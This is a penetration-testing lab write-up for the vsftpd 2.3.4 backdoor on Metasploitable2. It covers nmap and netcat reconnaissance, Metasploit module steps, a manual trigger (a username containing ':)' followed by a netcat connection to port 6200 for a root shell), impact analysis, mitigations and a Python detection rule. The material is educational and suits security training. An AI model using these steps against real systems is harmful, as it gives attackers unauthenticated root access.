
Metasploitable2 - FTP Exploitation using vsftpd 2.3.4 Backdoor

1. Objective

To identify and exploit a known vulnerability in an FTP service running on a vulnerable target machine using industry-standard reconnaissance and exploitation techniques.

2. Lab Environment

| Component | Description |
|---|---|
| Attacker Machine | Kali Linux |
| Target Machine | Metasploitable2 |
| Network Type | Host-only / NAT (same subnet) |

3. Tools & Technologies Used

  • Nmap – Network discovery and service enumeration
  • Netcat – Banner grabbing and manual interaction
  • Metasploit Framework – Exploitation
  • Exploit Database – Exploit reference

4. Methodology

Step 1: Identify Attacker Machine IP

ip a

  • Extract the IP address of the Kali machine (e.g., 192.168.1.159)

Step 2: Network Discovery


nmap -sn 192.168.1.0/24

  • Performs a ping scan to identify active hosts
  • Target identified: 192.168.1.160 → Metasploitable2

Step 3: Service Enumeration


nmap -sV 192.168.1.160

  • Detects running services and versions
  • Key finding: FTP → vsftpd 2.3.4

Step 4: Targeted Port Scan (FTP)


nmap -p 21 -sV 192.168.1.160

  • Confirms FTP service version

Step 5: Banner Grabbing (Manual Verification)

Using Netcat:


nc 192.168.1.160 21

  • Confirms: vsftpd 2.3.4

5. Vulnerability Identification

  • Software: vsftpd 2.3.4
  • Issue: Backdoor intentionally inserted in this version
  • Exploit Source: Exploit DB
  • Public exploit available:
    • Backdoor triggered via malicious username input

6. Exploitation using Metasploit

Step 1: Launch Framework


msfconsole

Step 2: Search for Exploit


search vsftpd

  • Relevant module: exploit/unix/ftp/vsftpd_234_backdoor

Step 3: Load Exploit


use exploit/unix/ftp/vsftpd_234_backdoor

Step 4: Configure Target


set RHOST 192.168.1.160

Step 5: Configure listener

set LHOST <Your IP>

Step 6: Execute Exploit


run

Result

  • Remote shell access obtained
  • Privilege level: root

7. Manual Exploitation (Without Metasploit)

Step 1: Connect to FTP


ftp 192.168.1.160

Step 2: Trigger Backdoor

  • Username: test:)
  • Password: anything

Step 3: Connect to Backdoor Shell


nc 192.168.1.160 6200

Result

  • Direct root shell access established

8. Technical Explanation of the Vulnerability

The backdoor in vsftpd 2.3.4 operates as follows:

  • If the username contains :)
  • The service triggers a hidden function
  • Opens TCP port 6200
  • Provides unauthenticated root shell access

Attack Flow


Attacker → FTP Login (malicious username)
→ Backdoor Triggered
→ Port 6200 Opened
→ Root Shell Access

9. Impact Analysis

| Factor | Impact |
|---|---|
| Confidentiality | Fully compromised |
| Integrity | Fully compromised |
| Availability | Potentially disrupted |
| Access Level | Root |

  • Classified as Critical (CVSS ~10.0)

10. Mitigation & Remediation

  • Upgrade FTP service to a secure version
  • Avoid using outdated software
  • Implement network segmentation
  • Use IDS/IPS to detect abnormal behavior
  • Disable unnecessary services
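
The IDS/IPS item above can be expressed as a small correlation rule. The following is an added example, not code from the original post: it flags an FTP USER command containing the trigger string and escalates when a connection to TCP 6200 on the same server follows within an assumed 60-second window. The Event record, the detect function and the sample events are hypothetical and constructed for illustration.

```python
from dataclasses import dataclass
from typing import Optional

TRIGGER = ":)"         # username substring from section 8
BACKDOOR_PORT = 6200   # port the backdoor opens, from section 8
WINDOW_S = 60          # assumption: correlation window, tune per sensor


@dataclass(frozen=True)
class Event:
    """Hypothetical normalized sensor record (not a real log format)."""
    ts: float                       # seconds
    src: str                        # client IP
    dst: str                        # server IP
    dport: int                      # destination TCP port
    ftp_user: Optional[str] = None  # argument of an FTP USER command


def detect(events, window=WINDOW_S):
    """Return (severity, server, client, ts) alerts in time order."""
    alerts = []
    armed = {}  # server IP -> time the trigger username was last seen
    for ev in sorted(events, key=lambda e: e.ts):
        if ev.dport == 21 and ev.ftp_user and TRIGGER in ev.ftp_user:
            armed[ev.dst] = ev.ts
            alerts.append(("medium", ev.dst, ev.src, ev.ts))
        elif ev.dport == BACKDOOR_PORT:
            # Correlate on the server only: the second connection may
            # arrive from a different client address than the FTP login.
            seen = armed.get(ev.dst)
            if seen is not None and ev.ts - seen <= window:
                alerts.append(("critical", ev.dst, ev.src, ev.ts))
    return alerts


# Constructed sample events using the lab addresses from this write-up.
SAMPLE = [
    Event(100.0, "192.168.1.159", "192.168.1.160", 21, "anonymous"),
    Event(200.0, "192.168.1.159", "192.168.1.160", 21, "test:)"),
    Event(203.0, "192.168.1.159", "192.168.1.160", 6200),
    Event(500.0, "192.168.1.50", "192.168.1.161", 6200),   # no trigger seen
    Event(900.0, "192.168.1.159", "192.168.1.160", 6200),  # outside window
]

if __name__ == "__main__":
    for alert in detect(SAMPLE):
        print(alert)
```

The trigger username alone is rated medium because the string can appear in a legitimate login attempt; the follow-up connection to port 6200 is what raises it to critical.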
